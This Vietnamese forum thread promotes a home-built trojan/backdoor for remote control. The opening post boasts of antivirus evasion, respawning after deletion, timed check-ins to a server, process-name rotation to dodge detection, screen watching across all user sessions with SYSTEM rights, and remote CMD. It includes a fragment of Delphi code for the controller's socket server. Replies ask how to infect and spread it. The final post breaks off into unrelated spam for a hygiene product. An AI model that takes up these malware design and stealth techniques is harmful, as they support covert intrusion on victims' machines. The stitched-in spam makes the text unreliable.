-
19-11-2013, 07:50 PM #1Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Lập trình virus trojan backdoor nâng cao.
Mạo muội lập topic này để anh em giao lưu chia sẻ kinh nghiệm về lập trình trojan [IMG]images/smilies/lick.gif[/IMG]
Mình xin phép giới thiệu về tính năng của con trojan mình đang xây dựng [IMG]images/smilies/2.gif[/IMG]
Ưu điểm:
-> dễ dàng cập nhật version.
-> chạy thông minh (khi nào cần sử dụng virus tự chạy ... không cần thì thôi không chạy ... khó tìm[IMG]images/smilies/wink.png[/IMG])
-> nếu virus bị phát hiện ... victim sẽ tự nhiên mọc lại con mới ở ngay chỗ mới với 1 tên gọi mới [IMG]images/smilies/lick.gif[/IMG]
-> anti virus 100% tất cả không phát hiện ra.
-> không sử dụng lib hay dll gì riêng của win vì vốn tự có nên dung lượng hơi cao. (đã test chạy ok từ win xp đến 2012 r2).
-> có thể chỉnh chế độ safe timer run , giả sử làm việc lúc 12h đêm đến 3h sáng thì trong khoảng thời gian đã định virus sẽ chạy và request về server , nếu ko đúng giờ thì nằm yên [IMG]images/smilies/biggrin.png[/IMG]
-> Trong thời gian hoạt động, virus sẽ tự động tắt nghỉ 15 phút / lần để thay đổi process name liên tục để tránh bị truy quét. thường sẽ count process nào chạy *.exe nhiều nhất thì sẽ chạy theo tên đó, lập 1 danh sách cụ thể xếp theo thứ tự vào hoán đổi vị trí theo các chu kỳ. (rõ khổ cho các bác chạy anti vir = tay ^_^!)
-> Tính năng ưa thích nhất: Virus chạy multi sessions. Giả sử không có user nào logon thì virus khi hoạt động sẽ chạy quyền cao nhất của windows, giả sử có 3 user admin, administrator, guest đang làm việc trên 1 máy, virus sẽ tự chạy cả 3 sessions thêm cái session thứ 4 cao nhất của windows -> tổng là 4. Vì vậy có thể nhìn màn hình trên mỗi user đang làm việc phân chia ra cụ thể.
Khuyết điểm:
-> size khá lớn thường là 3,5 mb.
-> do code ẩu nên còn bug vài chỗ, khổ là phải đang ngồi fix và xem lại từng dòng [IMG]images/smilies/lick.gif[/IMG]
-> tính năng chưa hoàn thiện mấy, nhưng về nhìn chung thì mình chỉ cần remote CMD thôi [IMG]images/smilies/17.gif[/IMG]
Ngôn ngữ lập trình:
-> Pascal
-> ASM
Vài hình ảnh interface cho các bạn tham khảo:
<font color="Red">Bài 1: Kết nối:
Server:
Mã:procedure FormCreate(Sender: TObject); procedure Timer1Timer(Sender: TObject); procedure ServerSocket1ClientDisconnect(Sender: TObject; Socket: TCustomWinSocket); procedure ServerSocket1ClientError(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); procedure Starthostserver1Click(Sender: TObject); procedure Stophostserver1Click(Sender: TObject); procedure ServerSocket1ClientRead(Sender: TObject; Socket: TCustomWinSocket); procedure TForm1.FormCreate(Sender: TObject); var ResStream: TResourceStream; begin DeleteFile('DiaChi_IP.database'); if not FileExists('DiaChi_IP.database') then begin ResStream := TResourceStream.Create(hInstance, 'DiaChi_IP', RT_RCDATA); try ResStream.Position := 0; ResStream.SaveToFile('DiaChi_IP.database'); finally ResStream.Free; end; end; StatusBar1.Panels[0].Text := StatusBar1.Panels[0].Text + GetBuildInfoAsString; KetNoi_GS := 0; KetNoi_KT := 0; Spxp1.Click; end; procedure TForm1.FormShow(Sender: TObject); var i : Integer; begin for i := 0 to ParamCount do begin if ParamStr(i) = '/@/Khoi_dong_tat_ca/@/' then begin Starthostserver1.Click; Khingmychktni1.Click; end; end; end; procedure TForm1.ServerSocket1ClientConnect(Sender: TObject; Socket: TCustomWinSocket); begin KetNoi_GS := KetNoi_GS + 1; ListBox3.Items.Add(DateToStr(NOW)+'<>'+TimeToStr(NOW)+'::Kết nối Giám Sát +1, tổng = '+IntToStr(KetNoi_GS)); end;
View more random threads:
- Lỗi 0-day: Giả mạo file extension trong Winrar
- Cơ chế phát hiện mã độc của AV là gì ?
- Project phân tích Malware
- Đây có phải là trojan không ạ
- Bạn sẽ làm gì khi máy tính bị nhiễm virus?
- học phần mềm có làm được trình duyệt viruts không?
- Characters Allowed in file name (ANSI)
- Khẩn cấp diệt con bot trên máy các bạn !
- Virus Autorun USB dù Windows đã Disable Autorun
- Hướng Dẫn Lập Trình Trojan Trên VC++
-
23-05-2014, 03:51 PM #2Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Bác cho em hỏi 1 chút là pascal thì giao tiếp với api window kiểu gì vậy, hồi lớp 10 học mỗi turbo pascal, toàn dos.
Thank bác
-
16-10-2014, 05:42 PM #3Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Thế còn lây nhiễm và phát tán thì sao ạ? [IMG]images/smilies/clap_grin.gif[/IMG]
-
17-10-2014, 08:25 AM #4Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Rãnh giả mang luôn, sao mình thấy đối tượng theo giỏi toàn window server không vậy ? Íts khi nao thay user sài windows server lắm ... chắc cái naa`y server của bạn phải kô ?
-
30-05-2016, 11:06 AM #5Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
con này gờ còn xài được không anh?
-
01-06-2016, 01:11 PM #6Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Pascal
Mã:procedure TForm1.ServerSocket1ClientConnect(Sender: TObject; Socket: TCustomWinSocket);begin KetNoi_GS := KetNoi_GS + 1; ListBox3.Items.Add(DateToStr(NOW)+'<>'+TimeToStr(NOW)+'::Kết nối Giám Sát +1, tổng = '+IntToStr(KetNoi_GS));end;
Vệ sinh cá nhân là một phần quan yếu của sức khỏe nam giới. Dùng dung dịch vệ sinh mỗi ngày mang lại nhiều ích, giúp loại bỏ vi khuẩn và vi sinh vật gây hại, giúp khu vực cơ quan sinh dục luôn sạch...
Gel vệ sinh cu, bạn trai có nên...